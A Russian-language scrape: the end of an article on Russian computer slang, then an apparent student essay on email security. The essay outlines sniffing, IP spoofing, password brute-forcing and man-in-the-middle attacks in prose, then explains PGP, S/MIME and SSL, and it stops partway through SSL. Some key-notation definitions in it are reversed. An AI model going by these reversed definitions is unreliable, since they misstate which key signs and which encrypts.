фактор сохраняет свое значение и для отечественных программистов, но, как представляется, отходит на второй план вместе со всей реальной действительностью, уступая место игровой проекции мира. Такое мировосприятие, безусловно, находит свое отражение и в языке. Используя жаргонизмы, многие из которых представляют собой яркие примеры языковой игры, в профессиональной сфере, российские программисты создают некую закрытую территорию, игровое пространство. Чтобы получить доступ к этому пространству, одной лишь компетентности недостаточно. Необходимо сходное мировосприятие, так как "ответ на вопрос загадки (лежащей в основе наименования) не может быть найден путем размышлений или логических рассуждений" (Хейзинга, 1997, с. 114).
Говоря о мотивации хакеров на основе изучения текстов форума на эту тему, О. В. Смыслова указывает на то, что многие из участников форума говорят о работе с компьютером как об игре. ""Fun" встречается в 35 письмах (13%), "испытывать удовольствие" от работы с компьютером (или определенной программой) - 20 раз (7%), а сравнение работы с компьютером с игрой - в 23 письмах (8%)" (Смыслова, 2001).
Интересно отметить, что в жаргонной лексике особенно прочно закрепляются и функционируют те искажения, которые в ходе фонетической трансформации приобретают звуковую форму, вызывающую у носителя русского языка ассоциации с ненормативной лексикой, ругательствами, табуированными выражениями. Можно привести большое количество примеров: блювануть (обработать почту в редакторе BlueWave), блястер (звуковая плата SoundBlaster), писиськер (встроенный динамик), херокс (техника производства компании Xerox), ссы (язык программирования C). Активное использование подобных жаргонизмов в сочетании с частым использованием ненормативной лексики вообще остается примечательным на фоне общего высокого образовательного уровня компьютерщиков. Это, однако, не представляет собой сугубо отечественный феномен. Стоит вспомнить оригинальные аббревиатуры, активно используемые как в американских, так и в русскоязычных конференциях: KMA (KissMyA*), RTFM (ReadTheF* Manual), STFU (ShutTheF* Up). Данное явление требует более пристального изучения.
В составе компьютерного жаргона можно выделить целую группу выражений, объединяющую названия всемирно известных брендов на компьютерном рынке: Хулит Плацкарт (HewlettPackard), Панаслоник (Panasonic), Херокс (Xerox), Багланд (Borland International), Мелкософт (Microsoft). Сниженная тональность номинаций этой группы может быть объяснена неприятием стандартов, навязываемых компьютерному сообществу производителями устройств и проприетарного программного обеспечения. Это нарушает правила игры, про которую речь шла выше, и вызывает осуждение. Эту же гипотезу подтверждают полярные оценки в компьютерном жаргоне сторонников традиционного программного обеспечения и программ с открытым исходным кодом. Например, презрительное "виндузятник" (пользователь ОС Windows) и уважительное "линуксоид" (пользователь ОС Linux).
В статье удалось указать лишь некоторые из возможных объяснений основных тенденций в развитии компьютерного сленга. Лингвокультурный подход позволяет выдвигать комплементарные гипотезы, позволяющие в дополнение к учету собственно лингвистических и экстралингвистических факторов более полно раскрыть новые явления в сфере языка. Чрезвычайный динамизм в развитии самой сферы информационных технологий приводит к тому, что на фоне достаточно большого количества работ по этой теме исследования в этой области лишь набирают силу. Жаргонизмы семилетней давности уже не известны подавляющему большинству пользователей, начинающих работу с компьютером. Компьютерный сленг претерпевает постоянные изменения. Наиболее перспективными представляются исследования в более специализированных областях: жаргон пользователей Интернета, жаргон геймеров, язык завсегдатаев чатов.
***
Смирнов Федор Олегович - аспирант ЯГПУ. Окончил факультет ностранных языков в 2002 году. С 2001 года работает в сфере информационных технологий: проектирование и разработка веб-ресурсов, веб-программирование, создание информационного наполнения сайтов. Сфера научных интересов - лингвокультурные особенности Рунета как особой информационной среды, влияние компьютера и ИТ на языковое сознание.
Список литературы
Войскунский А. Е. Развитие речевого общения как результат применения Интернета // Конференция "Социальные и психологические последствия применения информационных технологий" (01.02.2001 - 01.05.2001). URL: http://psynet.carfax.ru/texts/voysk6.htm
Гусейнов Г. Другие языки. Заметки к антропологии русского Интернета: особенности языка и литературы сетевых людей, 2000. URL: http://nlo.magazine.ru/dog/tual/main8.html
Ермакова О. И. Особенности компьютерного жаргона как специфической подсистемы русского языка, 2001. URL: http://www.dialog-21.ru/archive_article.asp?param=6683&y=2001&vol=6077
Котова О. Е. Структура и семантика англоязычного компьютерного жаргона // Научно-практическая телеконференция "Антропологический подход к исследованию социума: лингвистические, социолингвистические, культурологические аспекты", 2001. URL: http://www.isuct.ru/etc/antropos/section/3/kotova.htm
Смыслова О. В. Анализ представлений о мотивации хакеров // Конференция на портале "Аудиториум". "Социальные и психологические последствия применения информационных технологий" (01.02.2001 - 01.05.2001). Секция 5. Психология и педагогика детской одаренности в применении компьютеров и Интернета. Доклад. http://psynet.carfax.ru/texts/smyslova.htm
Хейзинга Й. Homo Ludens: Статьи по истории культуры / Пер., сост. и вступ. ст. Д.В. Сильвестрова. - М.: Прогресс - Традиция, 1997. - 416 с.
Онлайновый словарь компьютерного сленга URL: http://slovari.net/contents.php?sl=ej |
https://doc4web.ru/informatika/zaschita-elektronnoy-pochti-v-internet.html | Защита электронной почты в Internet | https://doc4web.ru/uploads/files/136/5713b4c9c168157d62a91a965d42424a.docx | files/5713b4c9c168157d62a91a965d42424a.docx | Содержание.
Введение 2
1. Способы защиты потока данных в Web 3
2. Защита на уровне приложений 4
2. 1. Система PGP 4
2. 2. Система S/MIME 7
3. Протоколы SSL и TLS 11
3. 1. Архитектура SSL 11
3. 2. Протокол записи SSL 11
3. 3. Протокол изменения параметров шифрования 12
3. 4. Протокол извещения 12
3. 5. Протокол квитирования 12
3. 6. Создание главного секретного ключа 15
3. 7. Генерирование криптографических параметров 15
3. 8. Что такое TLS и его отличие от SSL 16
4. Защита на уровне IP (сетевой уровень) 16
4. 1. Архитектура защиты на уровне IP 16
4. 2. Заголовок аутентификации (AH). 18
4. 2. 1. Структура заголовка 18
4. 2. 2. Использование AH в транспортном и туннельном режиме 18
4. 3. Протокол ESP 19
4. 3. 1. Формат пакета ESP 19
4. 3. 2. Шифрование и алгоритмы аутентификации 20
4. 3. 3. Транспортный режим ESP 20
4. 3. 4. Туннельный режим ESP 21
4. 4. Комбинация защищённых связей 22
Заключение 24
Источники информации 25
Введение.
Большинство проблем, с которыми сталкиваются пользователи электронной почты (спам, вирусы, разнообразные атаки на конфиденциальность писем и т. д.), связано с недостаточной защитой современных почтовых систем.
С этими проблемами приходится иметь дело и пользователям общедоступных публичных систем, и организациям. Практика показывает, что одномоментное решение проблемы защиты электронной почты невозможно. Спамеры, создатели и распространители вирусов, хакеры изобретательны, и уровень защиты электронной почты, вполне удовлетворительный вчера, сегодня может оказаться недостаточным. Для того чтобы защита электронной почты была на максимально возможном уровне, а достижение этого уровня не требовало чрезмерных усилий и затрат, необходим систематический и комплексный, с учетом всех угроз, подход к решению данной проблемы.
Предпосылки некоторых проблем, связанных непосредственно с конфиденциальностью почтовых сообщений, закладывались при возникновении электронной почты три десятилетия назад. Во многом они не разрешены до сих пор.
Ни один из стандартных почтовых протоколов (SMTP, POP3, IMAP4) не включает механизмов защиты, которые гарантировали бы конфиденциальность переписки.
Отсутствие надежной защиты протоколов позволяет создавать письма с фальшивыми адресами. Нельзя быть уверенным на 100% в том, кто является действительным автором письма.
Электронные письма легко изменить. Стандартное письмо не содержит средств проверки собственной целостности и при передаче через множество серверов, может быть прочитано и изменено; электронное письмо похоже сегодня на открытку.
Обычно в работе электронной почты нет гарантий доставки письма. Несмотря на наличие возможности получить сообщение о доставке, часто это означает лишь, что сообщение дошло до почтового сервера получателя (но не обязательно до самого адресата).
При выборе необходимых средств защиты электронной почты, обеспечивающих её конфиденциальность, целостность, необходимо для системного администратора или пользователя ответить на вопрос: какие наиболее типичные средства может использовать злоумышленник для атак систем электронной почты?
Приведём краткий пример данных средств и методов:
1–ый способ. Использование снифферов. Сниффер - представляют собой программы, перехватывающие все сетевые пакеты, передающиеся через определенный узел. Снифферы используются в сетях на вполне законном основании для диагностики неисправностей и анализа потока передаваемых данных. Ввиду того, что некоторые сетевые приложения, в частности почтовые, передают данные в текстовом формате (SMTP, POP3 и др.), с помощью сниффера можно узнать текст письма, имена пользователей и пароли.
2-ой способ. IP-спуфинг (spoofing) - возможен, когда злоумышленник, находящийся внутри организации или вне ее выдает себя за санкционированного пользователя. Атаки IP-спуфинга часто являются отправной точкой для других атак, например, DoS (Denial of Service – «отказ в обслуживании»). Обычно IP-спуфинг ограничивается вставкой ложной информации или вредоносных команд в обычный поток передаваемых по сети данных. Это происходит в случае, если главная задача состоит в получении важного файла. Однако злоумышленник, поменяв таблицы маршрутизации данных и направив трафик на ложный IP-адрес, может восприниматься системой как санкционированный пользователь и, следовательно, иметь доступ к файлам, приложениям, и в том числе к электронной почте.
3-й способ – получение пароля на почту. Атаки для получения паролей можно проводить с помощью целого ряда методов, и хотя входное имя и пароль можно получить при помощи IP-спуфинга и перехвата пакетов, их часто пытаются подобрать путем простого перебора с помощью специальной программы.
4-й способ нарушения конфиденциальности - Man-in-the-Middle («человек в середине») - состоит в перехвате всех пакетов, передаваемых по маршруту от провайдера в любую другую часть Сети. Подобные атаки с использованием снифферов пакетов, транспортных протоколов и протоколов маршрутизации проводятся с целью перехвата информации, получения доступа к частным сетевым ресурсам, искажения передаваемых данных. Они вполне могут использоваться для перехвата сообщений электронной почты и их изменений, а также для перехвата паролей и имен пользователей.
5-й способ. Атаки на уровне приложений используют хорошо известные слабости серверного программного обеспечения (sendmail, HTTP, FTP). Можно, например, получить доступ к компьютеру от имени пользователя, работающего с приложением той же электронной почты.
Для защиты сетевой инфраструктуры необходимо использовать:
Прежде всего сильные средства аутентификации, например, технология двухфакторной аутентификации.
Эффективное построение и администрирование сети. Речь идет о построении коммутируемой инфраструктуры, мерах контроля доступа и фильтрации исходящего трафика, закрытии «дыр» в программном обеспечении с помощью модулей «заплаток» и регулярном его обновлении, установке антивирусных программ и многом ином.
Криптография, которая не предотвращает перехвата информации и не распознает работу программ для этой цели, но делает эту работу бесполезной. Криптография также помогает от IP-спуфинга, если используется при аутентификации.
1. Способы защиты потока данных в Web.
Существует несколько подходов к обеспечению защиты данных в Web. Все они похожи с точки зрения предоставляемых возможностей и в некоторой степени с точки зрения используемых механизмов защиты, но различаются по областям применения и размещению соответствующих средств защиты в стеке протоколов TCP/IP.
Один из методов защиты данных в Web состоит в использовании протокола защиты IP (IPSec) Преимущество использования IPSec заключается в том, что этот протокол прозрачен для конечного пользователя и приложений и обеспечивает универсальное решение. Кроме того, протокол IPSec включает средства фильтрации, позволяющие использовать его только для той части потока данных, для которой это действительно необходимо.
Другим решением является размещение средств обеспечения безопасности сразу над протоколом TCP. Примером современной реализации такого подхода являются стандарт SSL (Secure Socket Layer — протокол защищенных сокетов) и его более новая версия — стандарт TLS (Transport Layer Security — протокол защиты транспортного уровня) безопасной передачи данных в Internet. На этом уровне для практической реализации данного подхода имеется две возможности. Самым общим решением является внедрение средств SSL (или TLS) в набор соответствующих протоколов, что обеспечивает прозрачность средств защиты для приложений. В то же время средства SSL можно встраивать и в прикладные программы. На пример, броузеры Netscape и Microsoft Internet Explorer, а также большинство Web-серверов имеют встроенную поддержку SSL.
Различные средства защиты могут встраиваться и в приложения. Преимущество данного подхода состоит в том, что соответствующие средства защиты могут быть настроены оптимальным образом в зависимости от требований конкретного приложения. В контексте безопасности Web важным примером реализации такого подхода является протокол SET (Secure Electronic Transaction — протокол защиты электронных транзакций).
HTTP
FTP
SMTP
HTTP
FTP
SMTP
S/MIME
PGP
SET
TCP
SSL или TLS
Kerberos
SMTP
HTTP
TCP
UDP
TCP
IP/IPSec
IP
IP
Сетевой уровень Транспортный уровень Уровень приложения
Размещение средств защиты в стеке протоколов TCP/IP.
2. Защита на уровне приложений.
2. 1. Система PGP.
Сервис PGP, если не рассматривать управление ключами, складывается из пяти функций: аутентификация, конфиденциальности, сжатия, совместимости на уровне электронной почты и сегментации.
Рассмотрим краткую характеристику функций PGP.
Функция
Используемые
алгоритмы
Описание
Цифровая
подпись
DSS/SHA или
RSA/SHA
С помощью SHA–1 создаётся хэш-код сообщения. Полученный таким образом профиль сообщения шифруется с помощью DSS или RSA с использованием личного ключа отправителя и включается в сообщение.
Шифрование
сообщения
CAST либо IDEA,
либо «тройной» DES c тремя ключами и алгоритмом Диффи-Хеллмана или RSA.
Сообщение шифруется с помощью CAST-128 или IDEA, или 3DES с одноразовым сеансовым ключом, генерируемым отправителем. Сеансовый ключ шифруется с помощью алгоритма Диффи-Хеллмана или RSA c использованием открытого ключа получателя и включается в сообщение.
Сжатие
ZIP
Сообщение можно сжать для хранения или передачи, использую zip.
Совместимость
на уровне
электронной
почты
Преобразование в формат radix-64
Чтобы обеспечить прозрачность для всех приложений электронной почты, шифрованное сообщение можно превратить в строку ASCII, используя преобразование в формат radix-64.
Сегментация
Чтобы удовлетворить ограничениям максимального размера сообщений, PGP выполняет сегментацию и обратную сборку сообщения.
Схема аутентификации.
Обозначения:
Ка – сеансовый ключ, используемый в схеме традиционного шифрования,
KRа – личный ключ А, используемый в схеме шифрования с открытым ключом,
KUа – открытый ключ А, используемый в схеме шифрования с открытым ключом,
EP – шифрование в схеме с открытым ключом,
DP – дешифрование в схеме с открытым ключом,
EC – шифрование в схеме традиционного шифрования,
DC – дешифрование в схеме традиционного шифрования,
H – функция хэширования,
|| – конкатенация,
Z – сжатие с помощью алгоритма zip,
R64 – преобразование в формат radix-64 ASCII.
Шаги:
Отправитель создает сообщение.
Используется алгоритм SHA-1, в результате чего получается 160-битовый хэш-вектор сообщения
Полученный хэш-вектор шифруется с помощью алгоритма RSA c использованием личного ключа отправителя, и результат добавляется в начало сообщения.
Получатель использует RSA с открытым ключом отправителя, чтобы дешифровать и восстановить хэш-код.
Получатель генерирует новый хэш-код полученного сообщения и сравнивает его с дешифрованным хэш-кодом. Если хэш-коды совпадают, сообщение считается подлинным.
Схема шифрования сообщения.
Шаги:
Отправитель генерирует сообщение и случайное 128-битовое число, которое выступает в качестве сеансового ключа только для этого сообщения.
Сообщение шифруется с помощью алгоритма CAST-128 (или IDEA, или 3DES) и данного сеансового ключа.
Сеансовый ключ шифруется с помощью алгоритма RSA и открытого ключа получателя и присоединятся к началу сообщения.
Получатель использует RSA c личным ключом, чтобы дешифровать и тем самым восстановить сеансовый ключ.
Сеансовый ключ применяется для дешифрования сообщения.
Схема использования обоих служб (подписи сообщения с помощью личного ключа и его шифровки с помощью сеансового ключа).
Отправитель сообщения:
Для сообщения генерируется подпись (хэш-вектор, зашифрованный личным ключом отправителя объединяется с открытым текстом сообщения).
Подпись и открытый текст сообщения сжимаются zip-ом
Сжатый открытый текст сообщения и подпись шифруются с помощью алгоритма CAST -128 (или IDEA, или 3DES), а сеансовый ключ шифруется с помощью RSA (или алгоритма Эль-Гамаля) при этом используется открытый ключ получателя.
Получатель сообщения
Cеансовый ключ дешифруется с помощью личного ключа получателя.
С помощью полученного сеансового ключа дешифрует сообщение
Распаковка сообщения
Открытым ключом отправителя дешифрует хэш-вектор и генерирует новый хэш-вектор.
Сравнивает их. Если совпадают сообщение не было изменено.
Идентификаторы ключей.
Так как получатель сообщения имеет возможность получать зашифрованные и подписанные сообщения от многих участников переписки, следовательно он должен иметь несколько пар личный/открытый ключей. Для того, чтобы получателю определить какой личный ключ (алгоритма RSA) надо использовать для расшифровки сеансового ключа (алгоритма CAST-128) он получает идентификатор открытого ключа (вместо самого ключа пересылается его идентификатор, так как сам открытый ключ для RSA может иметь длину в сотни десятичных разрядов). Идентификатор, связываемый с каждым открытым ключом, размещается в младших 64 разрядах ключа.
Идентификатор ключа требуется и для цифровой подписи PGP. Из-за того что отправитель может воспользоваться одним из нескольких личных ключей для шифрования профиля сообщения, получатель должен знать, какой открытый ключ ему следует использовать. Поэтому раздел цифровой подписи сообщения включает 64-битовый идентификатор соответствующего открытого ключа. При получении сообщения получатель проверяет, что идентификатор соответствует известному ему открытому ключу отправителя, а затем продолжает проверку подписи.
Формат передаваемого сообщения.
Сообщение
Подпись
Компонент сеансового ключа
Содержимое
Данные
Метка даты-времени
Имя файла
Профиль сообщения
Ведущие два октета профиля сообщения
Идентификатор открытого ключа отправителя (KUa)
Метка даты-времени
Сеансовый ключ (Ks)
Идентификатор открытого ключа получателя (Rub)
EkRa
EkUa
Операция
ZIP
Eкs
R64
ERUb – шифрование с использованием личного ключа пользователя B
EKRa – шифрование с использованием открытого ключа пользователя А
EКs – шифрование с использованием сеансового ключа
ZIP – функция сжатия ZIP
R64 – функция преобразования в формат radix-64.
Компонент подписи включает следующие элементы:
1. Метка даты-времени. Время создания подписи
2. Профиль сообщения. 160-битоавый профиль сообщения, созданный с помощью SHA-1 и шифрованный с использованием личного ключа подписи отправителя (KRа). Профиль вычисляется для метки даты-времени подписи, связанной конкатенацией с порцией данных компонента сообщения. Включение метки даты-времени подписи в профиль обеспечивает защиту от атак воспроизведения сообщения. Исключение имени файла и метки даты-времени компонента сообщения гарантирует, что отделённая подпись будет в точности совпадать с подписью, добавляемой в префикс сообщения. Отделенные подписи вычисляются для файла, в котором нет никаких полей заголовка сообщения.
3. Ведущие два октета профиля сообщения. Чтобы обеспечить получателю возможность определить, соответствующий ли открытый ключ использовался для шифрования профиля сообщения с целью аутентификации, проводится сравнение этих двух октетов открытого текста исходного профиля с первыми двумя октетами дешифрованного профиля. Эти октеты также служат 16-битовой последовательностью, используемой для проверки сообщения.
4. Идентификатор открытого ключа отправителя. Идентифицирует открытый ключ, который должен служить для дешифрования профиля сообщения и, следовательно, идентифицирует личный ключ, использовавшийся для шифрования профиля сообщения.
Компонент сообщения и необязательный компонент подписи могут быть сжаты с помощью ZIP и могут быть зашифрованы с использованием сеансового ключа.
Компонент сеансового ключа включает сеансовый ключ и идентификатор открытого ключа получателя, который использовался отправителем для шифрования данного сеансового ключа.
Весь блок обычно переводиться в формат radix-64. Перевод в формат radix-64 используется для совместимости на уровне электронной почты. Сервис аутентификации предполагает, что мы шифруем только профиль сообщения (цифровая подпись), сервис конфиденциальности предполагает, что мы шифруем само сообщение (сеансовым ключом) и подпись (при наличии последней), таким образом часть или весь выходной блок сообщения представляет собой поток произвольных 8-битовых байтов. Однако многие системы электронной почты позволяют использовать только блоки, состоящие из символов текста ASCII. Чтобы удовлетворить такому ограничению, PGP обеспечивает сервис конвертирования сырого 8-битового двоичного потока в поток печатаемых символов ASCII. Для этого используется схема конвертирования radix-64.
2. 2. Система S/MIME.
Система S/MIME (Secure/Multipurpose Internet Mail Extension – защищённые многоцелевые расширения электронной почты) является усовершенствованием с точки зрения защиты стандарта формата MIME электронной почты в Internet, базирующимся на использовании технологии RSA Data Security.Существуют основания полагать, что S/MIME станет стандартом коммерческого и промышленного использования, в то время как PGP останется альтернативой для защиты личной электронной почты большинства индивидуальных пользователей.
Стандарт MIME является расширением базового стандарта RFC 822, призванным решить некоторые проблемы и преодолеть ограничения протокола SMTP или некоторого другого протокола передачи почты, и RFC 822.
Ограничениями протокола SMTP, которые решает MIME являются:
SMTP не позволяет передавать исполняемые файлы и другие объекты в двоичном формате. Существует ряд схем преобразования двоичных файлов в текстовые (к ним относятся Uuencode/Uudecode для UNIX), которые затем могут быть использованы различными почтовыми системами SMTP/ Однако ни одна из таких схем не является стандартом.
SMTP не позволяет предавать текстовые данные, включающие символы национальных языков.
Шлюзы SMTP, выполняющие трансляцию кодов ASCII в коды EBCDIC и обратно, могут иметь разные таблицы перевода, что выливается в проблемы трансляции.
Исходя из этих недостатков технические спецификации MIME включают следующие элементы:
Определяется пять новых полей заголовка сообщения, которые могут включаться в заготовок RFC 822. Эти поля несут в себе информацию о теле сообщения.
Определяется несколько форматов содержимого, задающих стандарты представления документов мультимедиа в сообщениях электронной почты.
Определяются стандарты кодировок передаваемых данных, позволяющие защитить содержимое сообщения от изменения при осуществлении почтовыми системами преобразования передаваемых данных из одного формата в другой.
Стандарт MIME определяет пять полей заголовка сообщения, любые или все из которых могут включаться в заголовок RFC 822:
MIME-Version (версия MIME). Соответствующий параметр должен иметь значение 1.0. Это поле указывает, что сообщение соответствует стандартам RFC 2045 и 2046.
Content-Type (тип содержимого). Описывает данные, помещённые в тело сообщения, достаточно подробно для того, чтобы агент получателя смог выбрать соответствующий агент или механизм, позволяющий представить полученные данные пользователю или обработать их каким-то иным соответствующим образом.
Content-Transfer-Encoding (кодировка передаваемого содержания). Указывается тип преобразования, использовавшегося для того, чтобы представить тело сообщения в виде, приемлемом для пересылки почтой.
Сontent-ID (идентификатор содержимого). Служит для того, чтобы уникальным образом идентифицировать объекты MIME среди множества контекстов.
Content-description (описание содержимого). Текстовые описания объекта в теле сообщения; полезно тогда, когда объект имеет форму, недоступную для прочтения (например, звуковые данные).
Любая реализация, как минимум, должна поддерживать обработку полей MIME-Version, Content-Type и Сontent-Transfer-Encoding.
В S/MIME защита объекта MIME обеспечивается подписью, шифрованием или и тем, и другим одновременно. Объектом MIME может быть как всё сообщение (за исключением его заголовков RFC 822) или, в случае многокомпонентного содержимого MIME, одно или несколько частей сообщения. Объект MIME готовится в соответствии с обычными правилами подготовки сообщений MIME. Затем объект MIME вместе с некоторыми связанными с ним данными защиты (например, идентификаторами алгоритма и сертификатов) обрабатывается S/MIME, чтобы в результате получить то, что обычно называют объектом PKCS (Public-Key Cryptography Specification – спецификация криптографии с открытым ключом). С объектом PKCS затем обращаются как с содержимым сообщения, которое упаковывают в MIME (добавляя соответствующие заголовки MIME).
Помимо типов содержимого стандарта MIME, в стандарте S/MIME используются ряд новых типов содержимого, перечисленные в таблице. Все эти типы содержимого используют обозначения PKCS, опубликованные RSA Laboratories и доступные для S/MIME.
Тип
Подтип
Параметр S/MIME
Описание
Multipart (многокомпонентный)
Signed
(подписанный)
Открытое подписанное сообщение из двух частей: сообщения и его подписи
Application (приложение)
pkcs7-mime
signedData
Подписанные объект S/MIME
pkcs7-mime
envelopedData
Шифрованный объект S/MIME
pkcs7-mime
Degenerate signedData
Объект, содержащий только сертификаты открытых ключей
pkcs7-signature
-
Тип подписи, являющейся частью сообщения типа multipart/signed
pkcs10-mime
-
Сообщение запроса регистрации сертификата.
Формирование объекта envelopedData (упакованные данные).
При подготовке объекта envelopedData MIME должны быть выполнены следующие действия:
Генерируется псевдослучайный сеансовый ключ для конкретного алгоритма симметричной схемы шифрования (RC2/40 или 3DES).
Для каждого получателя сеансовый ключ шифруется с помощью открытого ключа получателя и RSA.
Для каждого получателя готовится блок данных, называемый RecipientInfo (информация для получателя), содержащий сертификат открытого ключа отправителя, идентификатор алгоритма, использовавшегося для шифрования сеансового ключа, и шифрованный сеансовый ключ.
Содержимое сообщения шифруется с помощью сеансового ключа.
Блоки RecipientInfo, за которыми следует шифрованное содержимое сообщения, вместе составляют блок envelopedData. Эта информация затем кодируется в формате base64 (radix-64).
Пример такого файла:
Content-Type: application/pkcs7-mime; smime-type=enveloped-data;
name=smime.p7m
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=smime.p7m
Rfvbn765BghyHhUjfewqwnvdCDC7
Формирование объекта signedData (подписанные данные).
Выбирается алгоритм создания профиля сообщения (SHA или MD5).
Вычисляется профиль сообщения (значение хэш-функции) для содержимого, которое должно быть подписано.
Профиль сообщения шифруется с помощью личного ключа стороны, подписавшей документ.
Подготавливается блок, называемый SignedInfo (информация подписавшей стороны), содержащий сертификат открытого ключа подписавшей документ стороны, идентификатор алгоритма, использовавшегося для шифрования профиля сообщения и шифрованного профиля сообщения.
Объект signedData формируется из ряда блоков, включающих идентификатор алгоритма создания профиля сообщения, само подписываемое сообщение и блок SignerInfo. Вся эта информация кодируется в base64. Пример такого сообщения (с исключёнными заголовками RFC 822):
Content-Type: application/pkcs7-mime; smime-type=signed-data;
name=smime.p7m
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=smime.p7m
Rfvbn765BghyHhUjfewqwnvdCDC7
Открытое подписанное сообщение.
Открытое подписанное сообщение получается тогда, когда для содержимого используется тип multipart и подтип signed. Сообщение типа multipart/signed включает две части.
Первая часть может быть любого типа MIME, но должна быть подготовлена так, чтобы она не была изменена в пути следования от источника к адресату. Это значит, что если первая часть не представлена в 7-битовой кодировке, то данные надо кодировать в формат base64. В первой части располагается открытый текст сообщения.
Вторая часть представляет собой отделённую подпись. Она формируется по алгоритму объекта signedData. В результате создаётся объект в формате signedData, поле содержимого которого оказывается пустым. Затем этот объект кодируется в формат base64, чтобы стать второй частью многокомпонентного сообщения. Для типа MIME этой второй части выбирается значение application, а для подтипа - pkcs7-signature. Пример такого сообщения:
Content-Type: multipart/signed;
Protocol=”application/pkcs7- signature”;
Micalg=shal; boundary=boundary42
-- boundary42
Content-Type: text/plain
Это открытый текст подписанного сообщения.
-- boundary42
Content-Type: application/pkcs7- signature; name=smime.p7m
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=smime.p7m
Rfvbn765BghyHhUjfewqwnvdCDC7
-- boundary42 --
Значение параметра protocol указывает но то, что этот объект является двухкомпонентным открытым подписанным сообщением. Значение параметра micalg указывает тип используемого профиля сообщения. Получатель может проверить подпись, вычислив профиль сообщения из первой части и сравнив его с профилем сообщения, который восстанавливается из подписи во второй части.
Криптографические алгоритмы.
В таблице представлены криптографические алгоритмы, используемы в системе S/MIME.
В S/MIME принята терминология, предложенная в документе RFC 2119 и позволяющая указать уровень требований.
ОБЯЗАТЕЛЬНО (MUST). Определение является абсолютным требованием спецификации. Любая реализация должна включать это свойство или функцию, чтобы соответствовать данной спецификации.
РЕКОМЕНДУЕТСЯ (SHOULD). В конкретном окружении могут существовать причины игнорировать это свойство или функцию, но рекомендуется, чтобы реализация всё же имела соответствующее свойство или функцию.
Функция
Требование
Создание профиля сообщения, используемого при формировании цифровой подписи.
ОБЯЗАТЕЛЬНА поддержка SHA-1 и MD5
РЕКОМЕНДУЕТСЯ использование SHA-1
Шифрование профиля сообщения для формирования цифровой подписи
Для агентов отсылки и приёма ОБЯЗАТЕЛЬНА поддержка DSS
Для агента отсылки РЕКОМЕНДУЕТСЯ поддержка шифрования RSA
Для агента приёма РЕКОМЕНДУЕТСЯ поддержка верификации подписей RSA с длиной ключа от 512 до 1024 битов.
Шифрование сеансового ключа для передачи с сообщением
Для агентов отсылки и приёма ОБЯЗАТЕЛЬНО поддержка алгоритма Диффи-Хеллмана.
Для агента отсылки РЕКОМЕНДУЕТСЯ поддержка шифрования RSA с длиной ключа от 512 до 1024 битов.
Для агента приёма РЕКОМЕНДУЕТСЯ поддержка дешифрования RSA
Шифрование сообщения для передачи с использованием сеансового ключа
Для агента отсылки РЕКОМЕНДУЕТСЯ поддержка шифрования tripleDES и RC2/40.
Для агента приёма ОБЯЗАТЕЛЬНА поддержка дешифрования tripleDES и РЕКОМЕНДУЕТСЯ поддержка дешифрования RC2/40.
S/MIME объединяет три алгоритма, использующих открытые ключ. Стандарт цифровой подписи (алгоритм DSS) является предпочтительным алгоритмом создания цифровой подписи. Предпочтительным алгоритмом шифрования сеансовых ключей в S/MIME называется алгоритм Диффи-Хеллмана, но фактически в S/MIME используется вариант алгоритма Диффи-Хеллмана, обеспечивающий шифрование/дешифрование и известный как алгоритм Эль-Гамаля. В качестве альтернативы как для подписей, так и для шифрования сеансовых ключей может использоваться алгоритм RSA.
Для шифрования сообщений рекомендуется «тройной» DES c тремя ключами (tripleDES), но любая гибкая реализация должна поддерживать 40-битовую версию алгоритма RC2. Последний является весьма слабым алгоритмом шифрования, но зато соответствует экспортным требованиям США.
3. Протоколы SSL и TLS.
3.1. Архитектура SSL.
Протокол SSL призван обеспечить возможность надежной защиты сквозной передачи данных с использованием протокола TCP. SSL представляет собой не один протокол, а два уровня протоколов. Протокол записи SSL (SSL Record Protocol) обеспечивает базовый набор средств защиты, применяемых протоколами более высоких уровней. Эти средства, в частности, может использовать протокол передачи гипертекстовых файлов (HTTP), призванный обеспечить обмен данными при взаимодействии клиентов и серверов Web. Частью SSL считаются и три протокола более высокого уровня: протокол квитирования установления связи (Handshake Protocol), протокол изменения параметров шифрования (Change Cipher Spec Protocol) и протокол извещения (Alert Protocol). Эти протоколы служат для управления обменом данными SSL.
Протокол квитирования SSL
Протокол изменения параметров шифрования SSL
Протокол извещения SSL
FTP, SMTP, HTTP.
Протокол записи SSL
TCP
IP
Стек протоколов SSL.
Между любой парой обменивающихся информацией сторон (например, приложений типа HTTP клиента и сервера) можно установить много защищенных соединений. Теоретически между сторонами можно установить и несколько одновременно существующих сеансов, но на практике такая возможность не используется.
Соединение (connection) — транспорт, обеспечивающий сервис некоторого подходящего типа (SMTP, HTTP и т.д.) Каждое соединение ассоциируется только с одним сеансом.
Сеанс (session). Сеанс SSL — это связь между клиентом и сервером. Сеансы создаются протоколом квитирования SSL (SSL Handshake Protocol). Сеанс определяет набор параметров криптографической защиты, которые могут использоваться несколькими соединениями. Сеансы позволяют избежать необходимости ведения переговоров об установлении параметров защиты для каждого нового соединения.
3.2. Протокол записи SSL
Протокол записи SSL (SSL Record Protocol) обеспечивает поддержку двух следующих сервисов для соединений SSL.
• Конфиденциальность. Протокол квитирования SSL (SSL Handshake Protocol) определяет общий для клиента и сервера секретный ключ, используемый алгоритмом традиционной схемы для шифрования данных, передаваемых по протоколу SSL.
• Целостность сообщений. Помимо обеспечения конфиденциальности, протокол квитирования SSL определяет общий секретный ключ для вычисления значений MAC (Message Authentication Code — код аутентичности сообщения).
Порядок отправки данных:
Этот протокол, получив сообщение для пересылки другой стороне, сначала фрагментирует данные, разбивая их на блоки подходящего размера;
При необходимости выполняет сжатие данных;
Применяет алгоритм вычисления MAC;
Шифрует данные (MAC +сжатое сообщение);
Добавляет заголовок
Передает полученные пакеты сегменту TCP.
При принятии данных: данные дешифруются, проверяются, восстанавливаются, собираются вновь и передаются приложениям более высокого уровня.
При вычислении кода аутентичности сообщения используется специальная схема вычисления MAC, в которой используется алгоритм хэширования MD5 или SHA-1.
Сжатое сообщение вместе с добавленным к нему значением MAC шифруется.
Используемые алгоритмы шифрования:
Блочное шифрование
Поточное шифрование
Алгоритм
Размер ключа
Алгоритм
Размер ключа
IDEA
128
RC4-40
40
RC2-40
40
RC4-128
128
DES-40
40
DES
56
3DES
168
Fortezza
80
В случае применения алгоритмов поточного шифрования шифруются только сжатое сообщение и добавленное к нему значение MAC.
